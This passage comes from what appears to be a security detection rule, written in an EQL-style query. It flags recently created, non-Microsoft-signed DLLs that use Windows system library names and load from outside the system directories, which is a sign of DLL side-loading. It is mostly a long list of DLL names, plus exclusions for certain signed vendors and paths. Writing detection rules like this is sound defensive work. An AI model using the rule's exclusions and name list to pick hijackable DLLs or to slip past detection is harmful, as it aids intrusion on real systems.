\"vcardparser.dll\", \"vdsbas.dll\", \"vdsdyn.dll\", \"vdsutil.dll\", \"vdsvd.dll\", \"vds_ps.dll\", \"verifier.dll\", \"version.dll\", \"vertdll.dll\", \"vfuprov.dll\", \"vfwwdm32.dll\", \"vhfum.dll\", \"vid.dll\", \"videohandlers.dll\", \"vidreszr.dll\", \"virtdisk.dll\", \"vmbuspipe.dll\", \"vmdevicehost.dll\", \"vmictimeprovider.dll\", \"vmrdvcore.dll\", \"voiprt.dll\", \"vpnike.dll\", \"vpnikeapi.dll\", \"vpnsohdesktop.dll\", \"vpnv2csp.dll\", \"vscmgrps.dll\", \"vssapi.dll\", \"vsstrace.dll\", \"vss_ps.dll\", \"w32time.dll\", \"w32topl.dll\", \"waasassessment.dll\", \"waasmediccapsule.dll\", \"waasmedicps.dll\", \"waasmedicsvc.dll\", \"wabsyncprovider.dll\", \"walletproxy.dll\", \"walletservice.dll\", \"wavemsp.dll\", \"wbemcomn.dll\", \"wbiosrvc.dll\", \"wci.dll\", \"wcimage.dll\", \"wcmapi.dll\", \"wcmcsp.dll\", \"wcmsvc.dll\", \"wcnapi.dll\", \"wcncsvc.dll\", \"wcneapauthproxy.dll\", \"wcneappeerproxy.dll\", \"wcnnetsh.dll\", \"wcnwiz.dll\", \"wc_storage.dll\", \"wdc.dll\", \"wdi.dll\", \"wdigest.dll\", \"wdscore.dll\", \"webauthn.dll\", \"webcamui.dll\", \"webcheck.dll\", \"webclnt.dll\", \"webio.dll\", \"webservices.dll\", \"websocket.dll\", \"wecapi.dll\", \"wecsvc.dll\", \"wephostsvc.dll\", \"wer.dll\", \"werconcpl.dll\", \"wercplsupport.dll\", \"werenc.dll\", \"weretw.dll\", \"wersvc.dll\", \"werui.dll\", \"wevtapi.dll\", \"wevtfwd.dll\", \"wevtsvc.dll\", \"wfapigp.dll\", \"wfdprov.dll\", \"wfdsconmgr.dll\", \"wfdsconmgrsvc.dll\", \"wfhc.dll\", \"whealogr.dll\", \"whhelper.dll\", \"wiaaut.dll\", \"wiadefui.dll\", \"wiadss.dll\", \"wiarpc.dll\", \"wiascanprofiles.dll\", \"wiaservc.dll\", \"wiashext.dll\", \"wiatrace.dll\", \"wificloudstore.dll\", \"wificonfigsp.dll\", \"wifidisplay.dll\", \"wimgapi.dll\", \"win32spl.dll\", \"win32u.dll\", \"winbio.dll\", \"winbiodatamodel.dll\", \"winbioext.dll\", \"winbrand.dll\", \"wincorlib.dll\", \"wincredprovider.dll\", \"wincredui.dll\", \"windowmanagement.dll\", \"windowscodecs.dll\", \"windowscodecsext.dll\", \"windowscodecsraw.dll\", \"windowsiotcsp.dll\", \"windowslivelogin.dll\", \"winethc.dll\", \"winhttp.dll\", \"winhttpcom.dll\", \"winhvemulation.dll\", \"winhvplatform.dll\", \"wininet.dll\", \"wininetlui.dll\", \"wininitext.dll\", \"winipcfile.dll\", \"winipcsecproc.dll\", \"winipsec.dll\", \"winlangdb.dll\", \"winlogonext.dll\", \"winmde.dll\", \"winml.dll\", \"winmm.dll\", \"winmmbase.dll\", \"winmsipc.dll\", \"winnlsres.dll\", \"winnsi.dll\", \"winreagent.dll\", \"winrnr.dll\", \"winrscmd.dll\", \"winrsmgr.dll\", \"winrssrv.dll\", \"winrttracing.dll\", \"winsatapi.dll\", \"winscard.dll\", \"winsetupui.dll\", \"winshfhc.dll\", \"winsku.dll\", \"winsockhc.dll\", \"winsqlite3.dll\", \"winsrpc.dll\", \"winsrv.dll\", \"winsrvext.dll\", \"winsta.dll\", \"winsync.dll\", \"winsyncmetastore.dll\", \"winsyncproviders.dll\", \"wintrust.dll\", \"wintypes.dll\", \"winusb.dll\", \"wirednetworkcsp.dll\", \"wisp.dll\", \"wkscli.dll\", \"wkspbrokerax.dll\", \"wksprtps.dll\", \"wkssvc.dll\", \"wlanapi.dll\", \"wlancfg.dll\", \"wlanconn.dll\", \"wlandlg.dll\", \"wlangpui.dll\", \"wlanhc.dll\", \"wlanhlp.dll\", \"wlanmediamanager.dll\", \"wlanmm.dll\", \"wlanmsm.dll\", \"wlanpref.dll\", \"wlanradiomanager.dll\", \"wlansec.dll\", \"wlansvc.dll\", \"wlansvcpal.dll\", \"wlanui.dll\", \"wlanutil.dll\", \"wldap32.dll\", \"wldp.dll\", \"wlgpclnt.dll\", \"wlidcli.dll\", \"wlidcredprov.dll\", \"wlidfdp.dll\", \"wlidnsp.dll\", \"wlidprov.dll\", \"wlidres.dll\", \"wlidsvc.dll\", \"wmadmod.dll\", \"wmadmoe.dll\", \"wmalfxgfxdsp.dll\", \"wmasf.dll\", \"wmcodecdspps.dll\", \"wmdmlog.dll\", \"wmdmps.dll\", \"wmdrmsdk.dll\", \"wmerror.dll\", \"wmi.dll\", \"wmiclnt.dll\", \"wmicmiplugin.dll\", \"wmidcom.dll\", \"wmidx.dll\", \"wmiprop.dll\", \"wmitomi.dll\", \"wmnetmgr.dll\", \"wmp.dll\", \"wmpdui.dll\", \"wmpdxm.dll\", \"wmpeffects.dll\", \"wmphoto.dll\", \"wmploc.dll\", \"wmpps.dll\", \"wmpshell.dll\", \"wmsgapi.dll\", \"wmspdmod.dll\", \"wmspdmoe.dll\", \"wmvcore.dll\", \"wmvdecod.dll\", \"wmvdspa.dll\", \"wmvencod.dll\", \"wmvsdecd.dll\", \"wmvsencd.dll\", \"wmvxencd.dll\", \"woftasks.dll\", \"wofutil.dll\", \"wordbreakers.dll\", \"workfoldersgpext.dll\", \"workfoldersres.dll\", \"workfoldersshell.dll\", \"workfolderssvc.dll\", \"wosc.dll\", \"wow64.dll\", \"wow64cpu.dll\", \"wow64win.dll\", \"wpbcreds.dll\", \"wpc.dll\", \"wpcapi.dll\", \"wpcdesktopmonsvc.dll\", \"wpcproxystubs.dll\", \"wpcrefreshtask.dll\", \"wpcwebfilter.dll\", \"wpdbusenum.dll\", \"wpdshext.dll\", \"wpdshserviceobj.dll\", \"wpdsp.dll\", \"wpd_ci.dll\", \"wpnapps.dll\", \"wpnclient.dll\", \"wpncore.dll\", \"wpninprc.dll\", \"wpnprv.dll\", \"wpnservice.dll\", \"wpnsruprov.dll\", \"wpnuserservice.dll\", \"wpportinglibrary.dll\", \"wpprecorderum.dll\", \"wptaskscheduler.dll\", \"wpx.dll\", \"ws2help.dll\", \"ws2_32.dll\", \"wscapi.dll\", \"wscinterop.dll\", \"wscisvif.dll\", \"wsclient.dll\", \"wscproxystub.dll\", \"wscsvc.dll\", \"wsdapi.dll\", \"wsdchngr.dll\", \"wsdprintproxy.dll\", \"wsdproviderutil.dll\", \"wsdscanproxy.dll\", \"wsecedit.dll\", \"wsepno.dll\", \"wshbth.dll\", \"wshcon.dll\", \"wshelper.dll\", \"wshext.dll\", \"wshhyperv.dll\", \"wship6.dll\", \"wshqos.dll\", \"wshrm.dll\", \"wshtcpip.dll\", \"wshunix.dll\", \"wslapi.dll\", \"wsmagent.dll\", \"wsmauto.dll\", \"wsmplpxy.dll\", \"wsmres.dll\", \"wsmsvc.dll\", \"wsmwmipl.dll\", \"wsnmp32.dll\", \"wsock32.dll\", \"wsplib.dll\", \"wsp_fs.dll\", \"wsp_health.dll\", \"wsp_sr.dll\", \"wtsapi32.dll\", \"wuapi.dll\", \"wuaueng.dll\", \"wuceffects.dll\", \"wudfcoinstaller.dll\", \"wudfplatform.dll\", \"wudfsmcclassext.dll\", \"wudfx.dll\", \"wudfx02000.dll\", \"wudriver.dll\", \"wups.dll\", \"wups2.dll\", \"wuuhext.dll\", \"wuuhosdeployment.dll\", \"wvc.dll\", \"wwaapi.dll\", \"wwaext.dll\", \"wwanapi.dll\", \"wwancfg.dll\", \"wwanhc.dll\", \"wwanprotdim.dll\", \"wwanradiomanager.dll\", \"wwansvc.dll\", \"wwapi.dll\", \"xamltilerender.dll\", \"xaudio2_8.dll\", \"xaudio2_9.dll\", \"xblauthmanager.dll\", \"xblgamesave.dll\", \"xblgamesaveext.dll\", \"xblgamesaveproxy.dll\", \"xboxgipsvc.dll\", \"xboxgipsynthetic.dll\", \"xboxnetapisvc.dll\", \"xinput1_4.dll\", \"xinput9_1_0.dll\", \"xinputuap.dll\", \"xmlfilter.dll\", \"xmllite.dll\", \"xmlprovi.dll\", \"xolehlp.dll\", \"xpsgdiconverter.dll\", \"xpsprint.dll\", \"xpspushlayer.dll\", \"xpsrasterservice.dll\", \"xpsservices.dll\", \"xwizards.dll\", \"xwreg.dll\", \"xwtpdui.dll\", \"xwtpw32.dll\", \"zipcontainer.dll\", \"zipfldr.dll\", \"bootsvc.dll\", \"halextintcpsedma.dll\", \"icsvcvss.dll\", \"ieproxydesktop.dll\", \"lsaadt.dll\", \"nlansp_c.dll\", \"nrtapi.dll\", \"opencl.dll\", \"pfclient.dll\", \"pnpdiag.dll\", \"prxyqry.dll\", \"rdpnanotransport.dll\", \"servicingcommon.dll\", \"sortwindows63.dll\", \"sstpcfg.dll\", \"tdhres.dll\", \"umpodev.dll\", \"utcapi.dll\", \"windlp.dll\", \"wow64base.dll\", \"wow64con.dll\", \"blbuires.dll\", \"bpainst.dll\", \"cbclient.dll\", \"certadm.dll\", \"certocm.dll\", \"certpick.dll\", \"csdeployres.dll\", \"dsdeployres.dll\", \"eapa3hst.dll\", \"eapacfg.dll\", \"eapahost.dll\", \"elsext.dll\", \"encdump.dll\", \"escmigplugin.dll\", \"fsclient.dll\", \"fsdeployres.dll\", \"fssminst.dll\", \"fssmres.dll\", \"fssprov.dll\", \"ipamapi.dll\", \"kpssvc.dll\", \"lbfoadminlib.dll\", \"mintdh.dll\", \"mmci.dll\", \"mmcico.dll\", \"mprsnap.dll\", \"mstsmhst.dll\", \"mstsmmc.dll\", \"muxinst.dll\", \"personax.dll\", \"rassfm.dll\", \"rasuser.dll\", \"rdmsinst.dll\", \"rdmsres.dll\", \"rtrfiltr.dll\", \"sacsvr.dll\", \"scrdenrl.dll\", \"sdclient.dll\", \"sharedstartmodel.dll\", \"smsrouter.dll\", \"spwizimg_svr.dll\", \"sqlcecompact40.dll\", \"sqlceoledb40.dll\", \"sqlceqp40.dll\", \"sqlcese40.dll\", \"srvmgrinst.dll\", \"svrmgrnc.dll\", \"tapisnap.dll\", \"tlsbrand.dll\", \"tsec.dll\", \"tsprop.dll\", \"tspubiconhelper.dll\", \"tssdjet.dll\", \"tsuserex.dll\", \"ualapi.dll\", \"ualsvc.dll\", \"umcres.dll\", \"updatehandlers.dll\", \"usocore.dll\", \"vssui.dll\", \"wsbappres.dll\", \"wsbonline.dll\", \"wsmselpl.dll\", \"wsmselrr.dll\", \"xpsfilt.dll\", \"xpsshhdr.dll\"\n ) and\n not (\n (\n dll.name : \"icuuc.dll\" and dll.code_signature.subject_name in (\n \"Valve\", \"Valve Corp.\", \"Avanquest Software (7270356 Canada Inc)\", \"Adobe Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"timeSync.dll\", \"appInfo.dll\") and dll.code_signature.subject_name in (\n \"VMware Inc.\", \"VMware, Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"libcrypto.dll\" and dll.code_signature.subject_name in (\n \"NoMachine S.a.r.l.\", \"Bitdefender SRL\", \"Oculus VR, LLC\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"ucrtbase.dll\" and dll.code_signature.subject_name in (\n \"Proofpoint, Inc.\", \"Rapid7 LLC\", \"Eclipse.org Foundation, Inc.\", \"Amazon.com Services LLC\", \"Windows Phone\"\n ) and dll.code_signature.trusted == true\n ) or\n (dll.name : \"ICMP.dll\" and dll.code_signature.subject_name == \"Paessler AG\" and dll.code_signature.trusted == true) or\n (dll.name : \"kerberos.dll\" and dll.code_signature.subject_name == \"Bitdefender SRL\" and dll.code_signature.trusted == true) or\n (dll.name : \"dbghelp.dll\" and dll.code_signature.trusted == true) or\n (dll.name : \"DirectML.dll\" and dll.code_signature.subject_name == \"Adobe Inc.\" and dll.code_signature.trusted == true) or\n (\n dll.path : (\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\dxgi.dll\",\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\wincorlib.dll\",\n \"?:\\\\Windows\\\\dxgi.dll\"\n )\n )\n )\n", + "query": "library where event.action == \"load\" and dll.Ext.relative_file_creation_time <= 3600 and\n not (\n dll.path : (\n \"?:\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\",\n \"?:\\\\Windows\\\\assembly\\\\NativeImages_v*\"\n )\n ) and\n not (\n dll.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Hardware Abstraction Layer Publisher\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows 3rd party Component\",\n \"Microsoft 3rd Party Application Component\"\n ) and dll.code_signature.trusted == true\n ) and not dll.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n dll.name : (\n \"aadauthhelper.dll\", \"aadcloudap.dll\", \"aadjcsp.dll\", \"aadtb.dll\", \"aadwamextension.dll\", \"aarsvc.dll\", \"abovelockapphost.dll\", \"accessibilitycpl.dll\", \"accountaccessor.dll\", \"accountsrt.dll\", \"acgenral.dll\", \"aclayers.dll\", \"acledit.dll\", \"aclui.dll\", \"acmigration.dll\", \"acppage.dll\", \"acproxy.dll\", \"acspecfc.dll\", \"actioncenter.dll\", \"actioncentercpl.dll\", \"actionqueue.dll\", \"activationclient.dll\", \"activeds.dll\", \"activesynccsp.dll\", \"actxprxy.dll\", \"acwinrt.dll\", \"acxtrnal.dll\", \"adaptivecards.dll\", \"addressparser.dll\", \"adhapi.dll\", \"adhsvc.dll\", \"admtmpl.dll\", \"adprovider.dll\", \"adrclient.dll\", \"adsldp.dll\", \"adsldpc.dll\", \"adsmsext.dll\", \"adsnt.dll\", \"adtschema.dll\", \"advancedemojids.dll\", \"advapi32.dll\", \"advapi32res.dll\", \"advpack.dll\", \"aeevts.dll\", \"aeinv.dll\", \"aepic.dll\", \"ajrouter.dll\", \"altspace.dll\", \"amsi.dll\", \"amsiproxy.dll\", \"amstream.dll\", \"apds.dll\", \"aphostclient.dll\", \"aphostres.dll\", \"aphostservice.dll\", \"apisampling.dll\", \"apisetschema.dll\", \"apmon.dll\", \"apmonui.dll\", \"appcontracts.dll\", \"appextension.dll\", \"apphelp.dll\", \"apphlpdm.dll\", \"appidapi.dll\", \"appidsvc.dll\", \"appinfo.dll\", \"appinfoext.dll\", \"applicationframe.dll\", \"applockercsp.dll\", \"appmgmts.dll\", \"appmgr.dll\", \"appmon.dll\", \"appointmentapis.dll\", \"appraiser.dll\", \"appreadiness.dll\", \"apprepapi.dll\", \"appresolver.dll\", \"appsruprov.dll\", \"appvcatalog.dll\", \"appvclientps.dll\", \"appvetwclientres.dll\", \"appvintegration.dll\", \"appvmanifest.dll\", \"appvpolicy.dll\", \"appvpublishing.dll\", \"appvreporting.dll\", \"appvscripting.dll\", \"appvsentinel.dll\", \"appvstreamingux.dll\", \"appvstreammap.dll\", \"appvterminator.dll\", \"appxalluserstore.dll\", \"appxpackaging.dll\", \"appxsip.dll\", \"appxsysprep.dll\", \"archiveint.dll\", \"asferror.dll\", \"aspnet_counters.dll\", \"asycfilt.dll\", \"atl.dll\", \"atlthunk.dll\", \"atmlib.dll\", \"audioeng.dll\", \"audiohandlers.dll\", \"audiokse.dll\", \"audioses.dll\", \"audiosrv.dll\", \"auditcse.dll\", \"auditpolcore.dll\", \"auditpolmsg.dll\", \"authbroker.dll\", \"authbrokerui.dll\", \"authentication.dll\", \"authext.dll\", \"authfwcfg.dll\", \"authfwgp.dll\", \"authfwsnapin.dll\", \"authfwwizfwk.dll\", \"authhostproxy.dll\", \"authui.dll\", \"authz.dll\", \"autopilot.dll\", \"autopilotdiag.dll\", \"autoplay.dll\", \"autotimesvc.dll\", \"avicap32.dll\", \"avifil32.dll\", \"avrt.dll\", \"axinstsv.dll\", \"azroles.dll\", \"azroleui.dll\", \"azsqlext.dll\", \"basecsp.dll\", \"basesrv.dll\", \"batmeter.dll\", \"bcastdvrbroker.dll\", \"bcastdvrclient.dll\", \"bcastdvrcommon.dll\", \"bcd.dll\", \"bcdprov.dll\", \"bcdsrv.dll\", \"bcp47langs.dll\", \"bcp47mrm.dll\", \"bcrypt.dll\", \"bcryptprimitives.dll\", \"bdehdcfglib.dll\", \"bderepair.dll\", \"bdesvc.dll\", \"bdesysprep.dll\", \"bdeui.dll\", \"bfe.dll\", \"bi.dll\", \"bidispl.dll\", \"bindfltapi.dll\", \"bingasds.dll\", \"bingfilterds.dll\", \"bingmaps.dll\", \"biocredprov.dll\", \"bisrv.dll\", \"bitlockercsp.dll\", \"bitsigd.dll\", \"bitsperf.dll\", \"bitsproxy.dll\", \"biwinrt.dll\", \"blbevents.dll\", \"blbres.dll\", \"blb_ps.dll\", \"bluetoothapis.dll\", \"bnmanager.dll\", \"bootmenuux.dll\", \"bootstr.dll\", \"bootux.dll\", \"bootvid.dll\", \"bridgeres.dll\", \"brokerlib.dll\", \"browcli.dll\", \"browserbroker.dll\", \"browseui.dll\", \"btagservice.dll\", \"bthavctpsvc.dll\", \"bthavrcp.dll\", \"bthavrcpappsvc.dll\", \"bthci.dll\", \"bthpanapi.dll\", \"bthradiomedia.dll\", \"bthserv.dll\", \"bthtelemetry.dll\", \"btpanui.dll\", \"bwcontexthandler.dll\", \"cabapi.dll\", \"cabinet.dll\", \"cabview.dll\", \"callbuttons.dll\", \"cameracaptureui.dll\", \"capauthz.dll\", \"capiprovider.dll\", \"capisp.dll\", \"captureservice.dll\", \"castingshellext.dll\", \"castlaunch.dll\", \"catsrv.dll\", \"catsrvps.dll\", \"catsrvut.dll\", \"cbdhsvc.dll\", \"cca.dll\", \"cdd.dll\", \"cdosys.dll\", \"cdp.dll\", \"cdprt.dll\", \"cdpsvc.dll\", \"cdpusersvc.dll\", \"cemapi.dll\", \"certca.dll\", \"certcli.dll\", \"certcredprovider.dll\", \"certenc.dll\", \"certenroll.dll\", \"certenrollui.dll\", \"certmgr.dll\", \"certpkicmdlet.dll\", \"certpoleng.dll\", \"certprop.dll\", \"cewmdm.dll\", \"cfgbkend.dll\", \"cfgmgr32.dll\", \"cfgspcellular.dll\", \"cfgsppolicy.dll\", \"cflapi.dll\", \"cfmifs.dll\", \"cfmifsproxy.dll\", \"chakra.dll\", \"chakradiag.dll\", \"chakrathunk.dll\", \"chartv.dll\", \"chatapis.dll\", \"chkwudrv.dll\", \"chsstrokeds.dll\", \"chtbopomofods.dll\", \"chtcangjieds.dll\", \"chthkstrokeds.dll\", \"chtquickds.dll\", \"chxapds.dll\", \"chxdecoder.dll\", \"chxhapds.dll\", \"chxinputrouter.dll\", \"chxranker.dll\", \"ci.dll\", \"cic.dll\", \"cimfs.dll\", \"circoinst.dll\", \"ciwmi.dll\", \"clb.dll\", \"clbcatq.dll\", \"cldapi.dll\", \"cleanpccsp.dll\", \"clfsw32.dll\", \"cliconfg.dll\", \"clipboardserver.dll\", \"clipc.dll\", \"clipsvc.dll\", \"clipwinrt.dll\", \"cloudap.dll\", \"cloudidsvc.dll\", \"clrhost.dll\", \"clusapi.dll\", \"cmcfg32.dll\", \"cmdext.dll\", \"cmdial32.dll\", \"cmgrcspps.dll\", \"cmifw.dll\", \"cmintegrator.dll\", \"cmlua.dll\", \"cmpbk32.dll\", \"cmstplua.dll\", \"cmutil.dll\", \"cngcredui.dll\", \"cngprovider.dll\", \"cnvfat.dll\", \"cofiredm.dll\", \"colbact.dll\", \"colorcnv.dll\", \"colorui.dll\", \"combase.dll\", \"comcat.dll\", \"comctl32.dll\", \"comdlg32.dll\", \"coml2.dll\", \"comppkgsup.dll\", \"compstui.dll\", \"computecore.dll\", \"computenetwork.dll\", \"computestorage.dll\", \"comrepl.dll\", \"comres.dll\", \"comsnap.dll\", \"comsvcs.dll\", \"comuid.dll\", \"configmanager2.dll\", \"conhostv1.dll\", \"connect.dll\", \"consentux.dll\", \"consentuxclient.dll\", \"console.dll\", \"consolelogon.dll\", \"contactapis.dll\", \"container.dll\", \"coredpus.dll\", \"coreglobconfig.dll\", \"coremas.dll\", \"coremessaging.dll\", \"coremmres.dll\", \"coreshell.dll\", \"coreshellapi.dll\", \"coreuicomponents.dll\", \"correngine.dll\", \"courtesyengine.dll\", \"cpfilters.dll\", \"creddialogbroker.dll\", \"credprovhelper.dll\", \"credprovhost.dll\", \"credprovs.dll\", \"credprovslegacy.dll\", \"credssp.dll\", \"credui.dll\", \"crypt32.dll\", \"cryptbase.dll\", \"cryptcatsvc.dll\", \"cryptdlg.dll\", \"cryptdll.dll\", \"cryptext.dll\", \"cryptnet.dll\", \"cryptngc.dll\", \"cryptowinrt.dll\", \"cryptsp.dll\", \"cryptsvc.dll\", \"crypttpmeksvc.dll\", \"cryptui.dll\", \"cryptuiwizard.dll\", \"cryptxml.dll\", \"cscapi.dll\", \"cscdll.dll\", \"cscmig.dll\", \"cscobj.dll\", \"cscsvc.dll\", \"cscui.dll\", \"csplte.dll\", \"cspproxy.dll\", \"csrsrv.dll\", \"cxcredprov.dll\", \"c_g18030.dll\", \"c_gsm7.dll\", \"c_is2022.dll\", \"c_iscii.dll\", \"d2d1.dll\", \"d3d10.dll\", \"d3d10core.dll\", \"d3d10level9.dll\", \"d3d10warp.dll\", \"d3d10_1.dll\", \"d3d10_1core.dll\", \"d3d11.dll\", \"d3d11on12.dll\", \"d3d12.dll\", \"d3d12core.dll\", \"d3d8thk.dll\", \"d3d9.dll\", \"d3d9on12.dll\", \"d3dscache.dll\", \"dab.dll\", \"dabapi.dll\", \"daconn.dll\", \"dafbth.dll\", \"dafdnssd.dll\", \"dafescl.dll\", \"dafgip.dll\", \"dafiot.dll\", \"dafipp.dll\", \"dafmcp.dll\", \"dafpos.dll\", \"dafprintprovider.dll\", \"dafupnp.dll\", \"dafwcn.dll\", \"dafwfdprovider.dll\", \"dafwiprov.dll\", \"dafwsd.dll\", \"damediamanager.dll\", \"damm.dll\", \"das.dll\", \"dataclen.dll\", \"datusage.dll\", \"davclnt.dll\", \"davhlpr.dll\", \"davsyncprovider.dll\", \"daxexec.dll\", \"dbgcore.dll\", \"dbgeng.dll\", \"dbghelp.dll\", \"dbgmodel.dll\", \"dbnetlib.dll\", \"dbnmpntw.dll\", \"dciman32.dll\", \"dcntel.dll\", \"dcomp.dll\", \"ddaclsys.dll\", \"ddcclaimsapi.dll\", \"ddds.dll\", \"ddisplay.dll\", \"ddoiproxy.dll\", \"ddores.dll\", \"ddpchunk.dll\", \"ddptrace.dll\", \"ddputils.dll\", \"ddp_ps.dll\", \"ddraw.dll\", \"ddrawex.dll\", \"defragproxy.dll\", \"defragres.dll\", \"defragsvc.dll\", \"deploymentcsps.dll\", \"deskadp.dll\", \"deskmon.dll\", \"desktopshellext.dll\", \"devenum.dll\", \"deviceaccess.dll\", \"devicecenter.dll\", \"devicecredential.dll\", \"devicepairing.dll\", \"deviceuxres.dll\", \"devinv.dll\", \"devmgr.dll\", \"devobj.dll\", \"devpropmgr.dll\", \"devquerybroker.dll\", \"devrtl.dll\", \"dfdts.dll\", \"dfscli.dll\", \"dfshim.dll\", \"dfsshlex.dll\", \"dggpext.dll\", \"dhcpcmonitor.dll\", \"dhcpcore.dll\", \"dhcpcore6.dll\", \"dhcpcsvc.dll\", \"dhcpcsvc6.dll\", \"dhcpsapi.dll\", \"diagcpl.dll\", \"diagnosticlogcsp.dll\", \"diagperf.dll\", \"diagsvc.dll\", \"diagtrack.dll\", \"dialclient.dll\", \"dialserver.dll\", \"dictationmanager.dll\", \"difxapi.dll\", \"dimsjob.dll\", \"dimsroam.dll\", \"dinput.dll\", \"dinput8.dll\", \"direct2ddesktop.dll\", \"directml.dll\", \"discan.dll\", \"dismapi.dll\", \"dispbroker.dll\", \"dispex.dll\", \"display.dll\", \"displaymanager.dll\", \"dlnashext.dll\", \"dmappsres.dll\", \"dmcfgutils.dll\", \"dmcmnutils.dll\", \"dmcsps.dll\", \"dmdlgs.dll\", \"dmdskmgr.dll\", \"dmdskres.dll\", \"dmdskres2.dll\", \"dmenrollengine.dll\", \"dmintf.dll\", \"dmiso8601utils.dll\", \"dmloader.dll\", \"dmocx.dll\", \"dmoleaututils.dll\", \"dmpushproxy.dll\", \"dmpushroutercore.dll\", \"dmrcdecoder.dll\", \"dmrserver.dll\", \"dmsynth.dll\", \"dmusic.dll\", \"dmutil.dll\", \"dmvdsitf.dll\", \"dmwappushsvc.dll\", \"dmwmicsp.dll\", \"dmxmlhelputils.dll\", \"dnsapi.dll\", \"dnscmmc.dll\", \"dnsext.dll\", \"dnshc.dll\", \"dnsrslvr.dll\", \"docprop.dll\", \"dolbydecmft.dll\", \"domgmt.dll\", \"dosettings.dll\", \"dosvc.dll\", \"dot3api.dll\", \"dot3cfg.dll\", \"dot3conn.dll\", \"dot3dlg.dll\", \"dot3gpclnt.dll\", \"dot3gpui.dll\", \"dot3hc.dll\", \"dot3mm.dll\", \"dot3msm.dll\", \"dot3svc.dll\", \"dot3ui.dll\", \"dpapi.dll\", \"dpapiprovider.dll\", \"dpapisrv.dll\", \"dpnaddr.dll\", \"dpnathlp.dll\", \"dpnet.dll\", \"dpnhpast.dll\", \"dpnhupnp.dll\", \"dpnlobby.dll\", \"dps.dll\", \"dpx.dll\", \"drprov.dll\", \"drt.dll\", \"drtprov.dll\", \"drttransport.dll\", \"drvsetup.dll\", \"drvstore.dll\", \"dsauth.dll\", \"dsccore.dll\", \"dsccoreconfprov.dll\", \"dsclient.dll\", \"dscproxy.dll\", \"dsctimer.dll\", \"dsdmo.dll\", \"dskquota.dll\", \"dskquoui.dll\", \"dsound.dll\", \"dsparse.dll\", \"dsprop.dll\", \"dsquery.dll\", \"dsreg.dll\", \"dsregtask.dll\", \"dsrole.dll\", \"dssec.dll\", \"dssenh.dll\", \"dssvc.dll\", \"dsui.dll\", \"dsuiext.dll\", \"dswave.dll\", \"dtsh.dll\", \"ducsps.dll\", \"dui70.dll\", \"duser.dll\", \"dusmapi.dll\", \"dusmsvc.dll\", \"dwmapi.dll\", \"dwmcore.dll\", \"dwmghost.dll\", \"dwminit.dll\", \"dwmredir.dll\", \"dwmscene.dll\", \"dwrite.dll\", \"dxcore.dll\", \"dxdiagn.dll\", \"dxgi.dll\", \"dxgwdi.dll\", \"dxilconv.dll\", \"dxmasf.dll\", \"dxp.dll\", \"dxpps.dll\", \"dxptasksync.dll\", \"dxtmsft.dll\", \"dxtrans.dll\", \"dxva2.dll\", \"dynamoapi.dll\", \"eapp3hst.dll\", \"eappcfg.dll\", \"eappcfgui.dll\", \"eappgnui.dll\", \"eapphost.dll\", \"eappprxy.dll\", \"eapprovp.dll\", \"eapputil.dll\", \"eapsimextdesktop.dll\", \"eapsvc.dll\", \"eapteapauth.dll\", \"eapteapconfig.dll\", \"eapteapext.dll\", \"easconsent.dll\", \"easwrt.dll\", \"edgeangle.dll\", \"edgecontent.dll\", \"edgehtml.dll\", \"edgeiso.dll\", \"edgemanager.dll\", \"edpauditapi.dll\", \"edpcsp.dll\", \"edptask.dll\", \"edputil.dll\", \"eeprov.dll\", \"eeutil.dll\", \"efsadu.dll\", \"efscore.dll\", \"efsext.dll\", \"efslsaext.dll\", \"efssvc.dll\", \"efsutil.dll\", \"efswrt.dll\", \"ehstorapi.dll\", \"ehstorpwdmgr.dll\", \"ehstorshell.dll\", \"els.dll\", \"elscore.dll\", \"elshyph.dll\", \"elslad.dll\", \"elstrans.dll\", \"emailapis.dll\", \"embeddedmodesvc.dll\", \"emojids.dll\", \"encapi.dll\", \"energy.dll\", \"energyprov.dll\", \"energytask.dll\", \"enrollmentapi.dll\", \"enterpriseapncsp.dll\", \"enterprisecsps.dll\", \"enterpriseetw.dll\", \"eqossnap.dll\", \"errordetails.dll\", \"errordetailscore.dll\", \"es.dll\", \"esclprotocol.dll\", \"esclscan.dll\", \"esclwiadriver.dll\", \"esdsip.dll\", \"esent.dll\", \"esentprf.dll\", \"esevss.dll\", \"eshims.dll\", \"etwrundown.dll\", \"euiccscsp.dll\", \"eventaggregation.dll\", \"eventcls.dll\", \"evr.dll\", \"execmodelclient.dll\", \"execmodelproxy.dll\", \"explorerframe.dll\", \"exsmime.dll\", \"extrasxmlparser.dll\", \"f3ahvoas.dll\", \"facilitator.dll\", \"familysafetyext.dll\", \"faultrep.dll\", \"fcon.dll\", \"fdbth.dll\", \"fdbthproxy.dll\", \"fddevquery.dll\", \"fde.dll\", \"fdeploy.dll\", \"fdphost.dll\", \"fdpnp.dll\", \"fdprint.dll\", \"fdproxy.dll\", \"fdrespub.dll\", \"fdssdp.dll\", \"fdwcn.dll\", \"fdwnet.dll\", \"fdwsd.dll\", \"feclient.dll\", \"ffbroker.dll\", \"fhcat.dll\", \"fhcfg.dll\", \"fhcleanup.dll\", \"fhcpl.dll\", \"fhengine.dll\", \"fhevents.dll\", \"fhshl.dll\", \"fhsrchapi.dll\", \"fhsrchph.dll\", \"fhsvc.dll\", \"fhsvcctl.dll\", \"fhtask.dll\", \"fhuxadapter.dll\", \"fhuxapi.dll\", \"fhuxcommon.dll\", \"fhuxgraphics.dll\", \"fhuxpresentation.dll\", 